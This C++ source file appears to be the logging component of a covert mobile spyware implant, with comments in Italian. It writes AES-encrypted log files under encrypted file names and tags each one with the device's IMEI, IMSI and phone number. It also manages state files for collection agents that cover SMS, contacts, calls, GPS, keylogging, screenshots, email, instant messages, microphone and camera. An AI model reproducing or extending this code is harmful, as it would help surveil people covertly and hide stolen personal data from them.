#include "Log.h"
#include "Device.h"
#include "Conf.h"

BOOL SortLogs(const LogInfo& lInfo, const LogInfo& rInfo) {
	return lInfo.date.QuadPart < rInfo.date.QuadPart;
}

Log::Log() : wName(NULL), wEncName(NULL), encryptionObj(NULL), hFile(INVALID_HANDLE_VALUE), pLogSnapshot(NULL){
	encryptionObj = new Encryption(g_AesKey, KEY_LEN);
}

BOOL Log::CreateLog(UINT LogType, BYTE* pByte, UINT uAdditional) {
	LogStruct LogDescription;
	SYSTEMTIME st;
	FILETIME ft;
	UINT Seq = 0;
	DWORD dwWritten;
	WCHAR *completeName = NULL, wLogName[4 + 6 + 1]; // MANAGEMENT: LogType, Seq, NULL

	ZeroMemory(wLogName, sizeof(wLogName));

	// Questo log gia' esiste? Se si dobbiamo tornare con un errore
	if(hFile != INVALID_HANDLE_VALUE) {
		return FALSE;
	}

	// Il file non dovrebbe esistere, ma nel caso effettuiamo un loop fino a trovare
	// un posticino per questo log.
	while(1) {
		if(wName) {
			delete[] wName;
			wName = NULL;
		}

		wsprintf(wLogName, L"%04x%06x", LogType, Seq);

		wName = MakeName(wLogName, TRUE);

		if(wName == NULL)
			return FALSE;

		hFile = CreateFile(wName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE) {
			break;
		}

		CloseHandle(hFile); // Chiudo il file
		Seq++;

		if(Seq > 0x00ffffff) { // Creiamo un punto di stop
			delete[] wName;
			wName = NULL;
			CloseLog();
			return FALSE;
		}
	}

	hFile = CreateFile(wName, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		delete[] wName;
		wName = NULL;
		return FALSE;
	}

	Device *deviceObj = Device::self();

	if(deviceObj == NULL) {
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	GetSystemTime(&st);
	SystemTimeToFileTime(&st, &ft);

	// Riempiamo i membri della struttura
	ZeroMemory(&LogDescription, sizeof(LogDescription));
	LogDescription.uVersion = LOG_VERSION_01;
	LogDescription.uLogType = LogType;
	LogDescription.uHTimestamp = ft.dwHighDateTime;
	LogDescription.uLTimestamp = ft.dwLowDateTime;
	LogDescription.uAdditionalData = uAdditional;
	LogDescription.uDeviceIdLen = WideLen((deviceObj->GetImei())); // XXX Non sono NULL-terminati
	LogDescription.uUserIdLen = WideLen(deviceObj->GetImsi());
	LogDescription.uSourceIdLen = WideLen(deviceObj->GetPhoneNumber());

	// Creiamo un buffer grande abbastanza da contenere l'header e gli additional data
	UINT uHeaderLen = sizeof(LogDescription) + LogDescription.uDeviceIdLen + LogDescription.uUserIdLen
							+ LogDescription.uSourceIdLen + LogDescription.uAdditionalData;

	// Paddiamo la dimensione al prossimo AES block
	BYTE *pHeader = new(std::nothrow) BYTE[encryptionObj->GetNextMultiple(uHeaderLen)];

	if(pHeader == NULL) {
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	ZeroMemory(pHeader, encryptionObj->GetNextMultiple(uHeaderLen));

	// Copiamo nel buffer tutti i dati dell'header
	BYTE *pTmp = pHeader;

	memcpy(pTmp, &LogDescription, sizeof(LogDescription));
	pTmp += sizeof(LogDescription);

	if(LogDescription.uDeviceIdLen) {
		memcpy(pTmp, deviceObj->GetImei(), WideLen(deviceObj->GetImei()));
		pTmp += WideLen(deviceObj->GetImei());
	}

	if(LogDescription.uUserIdLen) {
		memcpy(pTmp, deviceObj->GetImsi(), WideLen(deviceObj->GetImsi()));
		pTmp += WideLen(deviceObj->GetImsi());
	}

	if(LogDescription.uSourceIdLen) {
		memcpy(pTmp, deviceObj->GetPhoneNumber(), WideLen(deviceObj->GetPhoneNumber()));
		pTmp += WideLen(deviceObj->GetPhoneNumber());
	}

	if(LogDescription.uAdditionalData) {
		memcpy(pTmp, pByte, uAdditional);
	}

	// Cifriamo tutto l'header
	UINT tHeaderLen = encryptionObj->GetNextMultiple(uHeaderLen);
	BYTE* pEncryptedHeader = encryptionObj->EncryptData(pHeader, &tHeaderLen);

	delete[] pHeader;
	pHeader = NULL;

	if(pEncryptedHeader == NULL){
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	// Scriviamo la prima DWORD in chiaro che indica la dimensione dell'header paddato
	if(WriteFile(hFile, (BYTE *)&tHeaderLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] pEncryptedHeader;
		return FALSE;
	}


	// Scriviamo ora l'header cifrato e gli additional data
	if(WriteFile(hFile, pEncryptedHeader, tHeaderLen, &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] pEncryptedHeader;
		return FALSE;
	}

	delete[] pEncryptedHeader;
	pEncryptedHeader = NULL;

	return TRUE;
}

BOOL Log::WriteLog(BYTE* pByte, UINT uLen) {
	DWORD dwWritten;
	UINT t_len = uLen;
	BYTE* encrypted = NULL;

	if(hFile == INVALID_HANDLE_VALUE){
		return FALSE;
	}

	// Cifra i byte e scrivili
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	// Spostati alla fine del file
	SetFilePointer(hFile, 0, 0, FILE_END);

	// Scriviamo la dword che identifica la quantita' (in chiaro, unpaddato) di byte nel blocco
	if(WriteFile(hFile, (BYTE *)&uLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] encrypted;
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] encrypted;
		return FALSE;
	}

	// Lasciamo aperto l'handle al log, verra' usato dalla AppendLog()
	delete[] encrypted;
	return TRUE;
}

BOOL Log::CloseLog() {
	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	if(wEncName){
		free(wEncName);
		wEncName = NULL;
	}

	return TRUE;
}

// XXX Controllare se il nome gli arriva gia' completo di path
BOOL Log::RemoveLog(WCHAR* wLogName) {
	BOOL ret;

	if(wLogName == NULL)
		return FALSE;

	PWCHAR wName = GetCurrentPath(wLogName);
	
	if(wName == NULL)
		return FALSE;

	ret = DeleteFile(wLogName);

	delete[] wName;
	return ret;
}

list<LogInfo>* Log::ListLogs() {
	WIN32_FIND_DATA fd;
	FILETIME ft;
	list<LogInfo> *container = NULL;
	LogInfo tLogInfo;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR *filePath;

	// Generiamo la search string completa di path
	filePath = MakeName(L"*", TRUE);

	if(filePath == NULL)
		return NULL;

	hList = FindFirstFile(filePath, &fd);

	delete[] filePath;

	if(hList == INVALID_HANDLE_VALUE)
		return NULL;

	container = new(std::nothrow) list<LogInfo>;

	if(container == NULL) {
		FindClose(hList);
		return NULL;
	}

	container->clear();

	WCHAR *tFileName = GetCurrentPath(fd.cFileName);
	hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile != INVALID_HANDLE_VALUE) {
		GetFileTime(hFile, &ft, NULL, NULL);
		CloseHandle(hFile);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tFileName;
		container->push_back(tLogInfo);
	} else {
		delete[] tFileName;
	}

	while(FindNextFile(hList, &fd)){
		tFileName = GetCurrentPath(fd.cFileName);
		hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile != INVALID_HANDLE_VALUE) { 
			GetFileTime(hFile, &ft, NULL, NULL);
			CloseHandle(hFile);
			tLogInfo.date.HighPart = ft.dwHighDateTime;
			tLogInfo.date.LowPart = ft.dwLowDateTime;
			tLogInfo.pLog = tFileName;
			container->push_back(tLogInfo);
		} else {
			delete[] tFileName;
		}
	}

	FindClose(hList);
	container->sort(SortLogs);
	return container;
}

/*
list<WCHAR*>* Log::ListLogs() {
	struct log_info_data {
		WCHAR *pLog;
		ULARGE_INTEGER date;
	};

	WIN32_FIND_DATA fd;
	FILETIME ft;
	list<log_info_data> container;
	list<WCHAR *> *logs = NULL;
	log_info_data tLogInfo;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR *ext, *search, *tmp;

	logs = new(std::nothrow) list<WCHAR *>;
	logs->clear();

	if(logs == NULL)
		return NULL;

	// Come seed usiamo il primo byte del challenge
	ext = encryptionObj->EncryptName(LOG_EXTENSION, g_Challenge[0]);

	if(ext == NULL){
		logs->clear();
		delete logs;
		return NULL;
	}

	search = new(std::nothrow) WCHAR[1 + wcslen(LOG_EXTENSION) + 1];
	memset(search, 0x00, sizeof(WCHAR) * (1 + wcslen(LOG_EXTENSION) + 1));

	if(search == NULL){
		logs->clear();
		delete logs;
		free(ext);
		return NULL;
	}

	search[0] = '*';
	wcscat_s(search, 1 + wcslen(LOG_EXTENSION) + 1, ext);

	PWCHAR filePath = GetCurrentPath(search);

	if(filePath == NULL){
		logs->clear();
		delete logs;
		free(ext);
		return NULL;
	}

	hList = FindFirstFile(filePath, &fd);

	if(hList == INVALID_HANDLE_VALUE){
		int err = GetLastError();
		logs->clear();
		free(ext);
		delete[] search;
		delete[] filePath;
		return NULL;
	}

	tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

	if(tmp == NULL){
		logs->clear();
		free(ext);
		delete[] search;
		delete[] filePath;
		FindClose(hList);
		return NULL;
	}

	memset(tmp, 0x00, WideLen(fd.cFileName) + sizeof(WCHAR));
	memcpy(tmp, fd.cFileName, WideLen(fd.cFileName));

	container.clear();

	WCHAR *tFileName = GetCurrentPath(fd.cFileName);
	hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	delete[] tFileName;

	if(hFile != INVALID_HANDLE_VALUE) {
		GetFileTime(hFile, &ft, NULL, NULL);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tmp;
		container.push_back(tLogInfo);
		logs->push_back(tmp);
		CloseHandle(hFile);
	}

	while(FindNextFile(hList, &fd)){
		WCHAR *tFileName = GetCurrentPath(fd.cFileName);
		hFile = CreateFile(tFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
		delete[] tFileName;

		GetFileTime(hFile, &ft, NULL, NULL);
		tLogInfo.date.HighPart = ft.dwHighDateTime;
		tLogInfo.date.LowPart = ft.dwLowDateTime;
		tLogInfo.pLog = tmp;
		container.push_back(tLogInfo);


		tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

		if(tmp == NULL){
			// XXX - andrebbe cancellata la memoria allocata dentro log prima di ritornare
			logs->clear();
			free(ext);
			delete[] search;
			delete[] filePath;
			FindClose(hList);
			return NULL;
		}

		memset(tmp, 0x00, WideLen(fd.cFileName) + sizeof(WCHAR));
		memcpy(tmp, fd.cFileName, WideLen(fd.cFileName));
		logs->push_back(tmp);
	}

	free(ext);
	delete[] search;
	delete[] filePath;
	FindClose(hList);

	return logs;
}*/

BOOL Log::MakeLogSnapshot() {
	list<LogInfo>::iterator iter;

	// Liberiamo il precedente snapshot se esiste
	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++) {
			if((*iter).pLog) {
				delete[] (*iter).pLog;
				(*iter).pLog = NULL;
			}
		}

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	pLogSnapshot = ListLogs();

	if(pLogSnapshot == NULL)
		return FALSE;

	return TRUE;
}

list<LogInfo>* Log::GetLogSnapshot() {
	return pLogSnapshot;
}

BOOL Log::WriteMarkup(UINT uAgentId, BYTE *pData, UINT uLen) {
	HANDLE hMarkup = INVALID_HANDLE_VALUE;
	WCHAR *wMarkup = NULL, wMarkupName[1 + 4 + 1]; // M + Agent ID + NULL
	UINT uDataLen = uLen;
	BYTE *pEncData = NULL;
	DWORD dwWritten = 0;

	if(pData == NULL || uLen == 0)
		return FALSE;

	ZeroMemory(wMarkupName, sizeof(wMarkupName));
	wsprintf(wMarkupName, L"M%04x", uAgentId);

	wMarkup = MakeName(wMarkupName, TRUE);

	if(wMarkup == NULL)
		return FALSE;

	hMarkup = CreateFile(wMarkup, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hMarkup == INVALID_HANDLE_VALUE) {
		delete[] wMarkup;
		return FALSE;
	}

	delete[] wMarkup;

	// Cifriamo i dati
	pEncData = encryptionObj->EncryptData(pData, &uDataLen);

	if(pEncData == NULL) {
		CloseHandle(hMarkup);
		return FALSE;
	}

	// Scriviamo la DWORD che indica la dimensione del blocco in chiaro
	if(WriteFile(hMarkup, (BYTE *)&uLen, sizeof(uLen), &dwWritten, NULL) == FALSE) {
		CloseHandle(hMarkup);
		delete[] pEncData;
		return FALSE;
	}

	// Scriviamo il blocco cifrato
	if(WriteFile(hMarkup, pEncData, uDataLen, &dwWritten, NULL) == FALSE) {
		CloseHandle(hMarkup);
		delete[] pEncData;
		return FALSE;
	}

	// Chiudiamo il file e liberiamo il buffer
	CloseHandle(hMarkup);
	delete[] pEncData;

	return TRUE;
}

BYTE* Log::ReadMarkup(UINT uAgentId, UINT *uLen) {
	HANDLE hMarkup = INVALID_HANDLE_VALUE;
	WCHAR *wMarkup = NULL, wMarkupName[1 + 4 + 1]; // M + Agent ID + NULL
	UINT uDataLen;
	BYTE *pDecData = NULL, *pData = NULL;
	DWORD dwRead = 0;

	ZeroMemory(wMarkupName, sizeof(wMarkupName));
	wsprintf(wMarkupName, L"M%04x", uAgentId);

	wMarkup = MakeName(wMarkupName, TRUE);

	if(wMarkup == NULL)
		return NULL;

	hMarkup = CreateFile(wMarkup, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hMarkup == INVALID_HANDLE_VALUE) {
		delete[] wMarkup;
		return NULL;
	}

	delete[] wMarkup;

	// Leggiamo la DWORD che indica la dimensione del blocco in chiaro
	if(ReadFile(hMarkup, (BYTE *)&uDataLen, sizeof(uDataLen), &dwRead, NULL) == FALSE) {
		CloseHandle(hMarkup);
		return NULL;
	}

	// Diciamo al chiamante quanti byte sono validi nel blocco
	*uLen = uDataLen;

	// Allochiamo memoria per la lettura dei dati
	pData = new(std::nothrow) BYTE[encryptionObj->GetNextMultiple(uDataLen)];

	if(pData == NULL) {
		CloseHandle(hMarkup);
		return NULL;		
	}

	ZeroMemory(pData, encryptionObj->GetNextMultiple(uDataLen));

	// Leggiamo il blocco cifrato
	if(ReadFile(hMarkup, pData, encryptionObj->GetNextMultiple(uDataLen), &dwRead, NULL) == FALSE) {
		delete[] pDecData;
		CloseHandle(hMarkup);
		return NULL;
	}

	// Chiudiamo il file
	CloseHandle(hMarkup);

	// Decifriamo i dati
	pDecData = encryptionObj->DecryptData(pData, &uDataLen);
	
	if(pDecData == NULL) {
		delete[] pData;
		return NULL;
	}

	// Liberiamo il buffer
	delete[] pData;

	return pDecData;
}

BOOL Log::RemoveMarkup(UINT uAgentId){
	HANDLE hMarkup = INVALID_HANDLE_VALUE;
	WCHAR *wMarkup = NULL, wMarkupName[1 + 4 + 1]; // M + Agent ID + NULL

	ZeroMemory(wMarkupName, sizeof(wMarkupName));
	wsprintf(wMarkupName, L"M%04x", uAgentId);

	wMarkup = MakeName(wMarkupName, TRUE);

	if(wMarkup == NULL)
		return FALSE;

	if(DeleteFile(wMarkup) == FALSE) {
		delete[] wMarkup;
		return FALSE;
	}
	
	delete[] wMarkup;
	return TRUE;
}

// Cancella tutti i markup
// MANAGEMENT - Aggiungere qui tutti i nuovi agenti/eventi
void Log::RemoveMarkups() {
	RemoveMarkup(AGENT_SMS);
	RemoveMarkup(AGENT_PHONEBOOK);
	RemoveMarkup(AGENT_CALLLIST);
	RemoveMarkup(AGENT_DEVICE);
	RemoveMarkup(AGENT_GPS);
	RemoveMarkup(AGENT_CALL);
	RemoveMarkup(AGENT_CALL_LOCAL);
	RemoveMarkup(AGENT_KEYLOG);
	RemoveMarkup(AGENT_SNAPSHOT);
	RemoveMarkup(AGENT_URL);
	RemoveMarkup(AGENT_IM);
	RemoveMarkup(AGENT_EMAIL);
	RemoveMarkup(AGENT_MIC);
	RemoveMarkup(AGENT_CAM);

	RemoveMarkup(EVENT_TIMER);
	RemoveMarkup(EVENT_SMS);
	RemoveMarkup(EVENT_CALL);
	RemoveMarkup(EVENT_CONNECTION);
	RemoveMarkup(EVENT_PROCESS);
	RemoveMarkup(EVENT_POSITION);
	RemoveMarkup(EVENT_QUOTA);

	return;
}

WCHAR* Log::MakeName(WCHAR *wName, BOOL bAddPath) {
	WCHAR *wLogName = NULL;

	if(wName == NULL || wcslen(wName) == 0)
		return NULL;

	// Nome dei log: QMLxxx...xxx.mob
	wLogName = new(std::nothrow) WCHAR[wcslen(L"XXX.xxx") + wcslen(wName) + 1];

	if(wLogName == NULL)
		return FALSE;

	ZeroMemory(wLogName, WideLen(L"XXX.xxx") + WideLen(wName) + sizeof(WCHAR));

	wsprintf(wLogName, L"%s%s%s", LOG_PREFIX, wName, LOG_EXTENSION);
	wEncName = encryptionObj->EncryptName(wLogName, g_Challenge[0]);

	if(wEncName == NULL) {
		delete[] wLogName;
		return NULL;
	}

	if(bAddPath) {
		wLogName = GetCurrentPath(wEncName);
	}

	if(wEncName) {
		free(wEncName);
		wEncName = NULL;
	}

	if(wLogName)
		return wLogName;

	return NULL;
}

WCHAR* Log::MakeName(UINT uAgentId, BOOL bAddPath) {
	WCHAR wLogName[10];

	ZeroMemory(wLogName, sizeof(wLogName));
	wsprintf(wLogName, L"%06x", uAgentId);

	return MakeName(wLogName, bAddPath);
}

Log::~Log() {
	list<LogInfo>::iterator iter;

	CloseLog();

	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++) {
			if((*iter).pLog) {
				delete[] (*iter).pLog;
				(*iter).pLog = NULL;
			}
		}

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	if(encryptionObj)
		delete encryptionObj;
}
